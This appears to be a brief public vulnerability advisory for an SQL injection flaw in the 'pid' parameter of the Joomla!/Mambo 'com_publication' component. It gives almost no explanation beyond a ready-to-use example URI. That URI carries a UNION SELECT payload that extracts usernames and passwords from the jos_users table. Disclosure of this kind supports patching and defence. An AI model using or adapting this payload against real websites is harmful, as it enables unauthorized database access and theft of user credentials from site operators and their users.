Joomla! and Mambo 'com_publication' Component 'pid' Parameter SQL Injection Vulnerability

Joomla! and Mambo 'com_publication' Component 'pid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs is available:

http://www.example.com/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/*